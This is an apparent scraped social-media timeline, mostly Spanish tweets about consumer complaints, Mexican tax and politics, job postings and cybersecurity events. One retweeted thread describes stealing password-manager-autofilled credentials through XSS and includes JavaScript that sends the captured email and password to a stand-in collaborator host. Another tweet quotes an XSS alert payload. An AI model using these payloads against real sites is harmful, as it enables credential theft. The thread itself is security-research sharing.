Juan Carlos Calderon

@MotorpasionMex ¿tienen el dato de quejas de profeco por año? saber cuales marcas se van consolidando y cuales son "pura lengua", sería muuuy valioso. Y eso de que ya solo quedan 10% de quejas de JAC, ,meh..., igual se tuvieron que poner todas esas quejas para que hicieran caso!

Estas son las marcas de autos que más quejas tienen en Profeco en México: tres en las que más suele haber reclamaciones son chinas motorpasion.com.mx/p/37306?utm_so… via @motorpasionmexico

motorpasion.com.mx/p/37306?utm_so… no tienen el dato por año @motorpasionmexico eso nos daría idea de cuales marcas se han ido consolidando con menos quejas que en sus años iniciales y sería muuuuy valioso!!

🌟 Borealix en el México Business Summit 2025 🌐 👥 Gracias a todos los asistentes por las valiosas interacciones y oportunidades de colaboración. #MéxicoBusinessSummit #Ciberseguridad #InnovaciónDigital #Networking #Borealix

@hakluke @_nunohumberto Darn good music 🤣

Just listening to '\"><img src=x onerror=alert(document.domain)> by @_nunohumberto 😂

@mARQcello Ha, ha, ha, mientras estoy de acuerdo con respecto a lo de andar haciendo "juntas de pueblo", me ha gustado el manejo que le han dado a la situación hasta ahora. No estoy de acuerdo en todo, pero si me ha gustado el manejo de la situacion hasta ahora :)

Casi una semana para disfrutar lo votado y prepararse para "responder a la nación" yendo al zócalo, a mostrar que el pueblo de México está unido y es fuerte. Gobierno Cutre.

Someone just sent me an XSS to collaborate on. It was an interesting case so I thought I'd tweet about it. They'd found an xss in auth.example.com, which was a subdomain that is only used to authenticate users. They were having trouble escalating the XSS because this subdomain has no access to the main application at app.example.com, or the API it interacts with, which is at api.example.com. I immediately thought of something that I'd heard recently (maybe on @ctbbpodcast?) where you can use an XSS to steal auto-filled plaintext credentials, so I thought I'd try to replicate this. First, injected a fake login form, like this:

This is good enough to have a password manager automatically fill the credentials if it is injected into any page on the correct domain. Now we just needed to send the credentials to the attacker server, I wrote some basic JS to do this: setTimeout(function(){ httpRequest = new XMLHttpRequest(); httpRequest.open('GET', 'https://BURP_COLLABORATOR?'+document.getElementById("email").value+"="+document.getElementById("password").value); httpRequest.send();},2000) The timeout is required because it takes a while for the password manager to autofill the passwords. Then I used the XSS to inject the form, and the JavaScript, and voila! Plaintext credentials. This isn't a new technique, I can see there are a bunch of other articles about it - but it's the first time I've exploited an XSS to steal creds from a password manager like this, so I figured some others would find it interesting.

Aparentemente hackearon @WhatsApp y robaron 487 millones de números de teléfono de cuentas activas de todo el mundo. Están a la venta por miles de dólares, y según @CyberNews, se ha corroborado que la base de datos es real. Recomiendan activar la verificación en 2 pasos.

@Mel_Ys_Ao Si tengo el derecho, pero.... ¿y la voilación de la ley que? para el SAT o sus funcionarioes ni siquiera es hay una palmadita en la mano, todo se queda en mera letra escrita. ¿Donde queda la moralidad tambien?

@JCMaxSec Tienes derecho a recibir el pago de los intereses generados sobre el importe actualizado a partir de la fecha de vencimiento, al ser devolución extemporánea.

¡Denuncia! En el SAT hay cero tolerancia para quien comete prácticas ilegales. Sin tregua contra la corrupción.

contralacorrupcion.mx/hacienda-subsi… porque no me subsidian a mi tambien :( @EVIDEGARAY @jrsestaca @lacornetafm

México bajo ciberataques. ¿Qué posibles implicaciones tiene el ciberataque a SEDENA en México? linkedin.com/feed/update/ur…

@EVIDEGARAY cuando AMLO se retire. No va a tener pensión presidencial? Ya renunció a ella?

@MarioBeteta Es enorme la productividad y dinero perdido en esta "insistencia". Creo que hay mejores maneras, como que el patrón haga una validación masiva de los datos de los empleados y luego entrege constancias a cada trabajador, eso ahorarria muchisimo trabajo a todos

“Uno de los objetivos del SAT es que cada contribuyente se haga responsable de su situación fiscal. Por eso insisten en hacer la entrega directa a los trabajadores y no a los empleados de la información fiscal”.

Hablamos sobre la prórroga otorgada por el SAT prórroga para la entrega de la Constancia de situación fiscal con el Lic. Miguel Ángel Medina, fiscal de @GarridoLicona. 📻103.3 fm, 970 AM 💻radioformula.com.mx/103-3-fm-progr… @radio_formula #entrevista

Echa un vistazo a este empleo de Axos Bank linkedin.com/jobs/view/2896… Esta buenisimos y si tienen dudas preguuuntenme!

Estamos contratando a lider de operaciones y calidad que sirva como punto de contacto con clientes. Si conocen algun interesado, ¡favor de recomendarlo! linkedin.com/jobs/view/2754…

Gracias a la UACH por invitarme a participar en su diplomado de seguridad informática. Nos vemos ahi la proxima semana diplomadoanuies.uach.mx #UACH #seguridaddelainformación #seguridadinformatica

@pcoronaf Ojalá sacarán el manual de ciberseguridad para gobierno. Algunos sitios ni siquiera tienen firewall, menos otras prácticas

La Guardia Nacional publica el Manual Básico de Ciberseguridad para la Micro, Pequeña y Mediana Empresa gob.mx/cms/uploads/at…

Contrast Security community Edition Demo (En Español) youtu.be/y6X-52Z9J7Q via @YouTube